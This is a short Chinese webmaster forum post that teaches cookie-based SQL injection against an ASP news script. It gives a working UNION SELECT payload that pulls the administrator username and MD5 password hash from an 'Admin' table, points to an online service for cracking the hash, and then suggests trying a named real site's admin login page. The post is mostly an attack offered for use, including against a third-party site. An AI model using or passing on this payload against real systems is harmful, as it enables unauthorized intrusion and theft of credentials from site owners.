![]() |
|
|||||||
| 建站交流 讨论网站建设的基本方法、技巧、空间问题讨论、域名交流、 资源分享、技术交流,站长们经常进来看看噢! |
|
|
Thread Tools | Display Modes |
|
#1
IP: 222.76.215.26
|
|||
|
|||
|
注入漏洞
下面我们来测试一下:我们就来 利用shownews.asp 在地址栏中打开http://127.0.0.1/shownews.asp?id=1 清空地址栏, 利用union语句来注入,提交:javascript:alert(document.cookie="id="+escape("77 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin")) 提交后我们访问http://127.0.0.1/shownews.asp 在页面中直接返回了管理员的帐号和16位MD5加密的密码,这样我们就已成功拿到了管理员的帐号和密码。 然后上http://www.cmd5.com/default.aspx就可以破解16位MD5加密的密码了. 试下http://www.weikete.com/admin/login.asp |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|